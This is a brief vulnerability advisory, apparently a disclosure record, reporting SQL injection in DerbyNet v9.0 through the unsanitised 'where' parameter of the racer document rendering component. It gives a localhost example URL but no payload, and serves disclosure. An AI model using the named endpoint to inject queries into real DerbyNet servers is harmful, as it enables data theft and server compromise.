An SQL Injection vulnerability has been discovered in DerbyNet version 9.0, specifically within the `print/render/racer.inc` component. This vulnerability allows remote attackers to execute arbitrary code and disclose sensitive information by exploiting improper sanitization of the `where` clause in Racer Document Rendering.

Vulnerability Type: SQL Injection

Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet

Affected Product Code Base: DerbyNet - v9.0

Affected Component: print/render/racer.inc

Attack Type: Remote

Impact:  
- Code execution: True  
- Information Disclosure: True

Attack Vectors:  
The vulnerability is present in the `print/render/racer.inc` component of DerbyNet, due to insufficient sanitization of the `where` parameter within the URL. Attackers can manipulate SQL queries by injecting malicious SQL commands through the `where` parameter, as demonstrated in the following URL:  
- `http://127.0.0.1:8000/render-document.php/award/GoldCupAwardDocument?where=1`

This manipulation could lead to unauthorized access to database information and potential code execution on the server hosting the application.

Discoverer: Valentin Lobstein

References:  
- Official website: http://derbynet.com  
- Source code on GitHub: https://github.com/jeffpiazza/derbynet

Tag

#php